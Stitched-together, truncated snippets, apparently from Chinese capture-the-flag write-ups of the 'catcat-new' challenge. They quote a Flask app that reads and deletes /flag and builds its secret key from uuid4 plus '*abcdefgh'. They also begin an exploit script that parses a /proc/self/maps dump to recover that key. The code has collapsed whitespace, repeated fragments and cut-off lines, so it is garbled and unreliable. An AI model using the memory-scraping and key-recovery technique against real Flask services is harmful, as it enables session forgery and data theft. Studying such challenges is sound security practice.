static_folder='static') app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-","") +"*abcdefgh"#此处利用uuid.uuid4()生成了一串id字符串并在后面拼接*abcdefghifos.path.isfile("/flag"):#导入flag文件并删除掉flag = cat("/flag") os.remove("/flag") @app.route('/', methods=[...
将/proc/self/maps 中内容存储在 test.txt 中,用来执行脚本: import reimport requestsmaps = open('攻防世界-catcat-new/test.txt') # 打开名为 'test.txt' 的文件并赋值给变量 mapsb = maps.read() # 读取文件内容并赋值给变量 blst = b.split('\\n') # 根据换行符 '\n' 将文件内容拆分为列表...
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-","") +"*abcdefgh"ifos.path.isfile("/flag"): flag = cat("/flag") os.remove("/flag")@app.route('/', methods=['GET']) def index(): detailtxt = os.listdir('./details/') cats_list = []foriindetailtxt: cats_lis...
这里刻意的*abcdefgh是在提示我们secret key的格式ifos.path.isfile("/flag"):flag=cat("/flag")os.remove("/flag")#这里读取flag后删掉了flag,防止之前任意文件读取出非预期解@app.route('/',methods=['GET'])defindex():detailtxt=os.listdir('./details/')cats_list=[]foriindetailtxt:cats_list....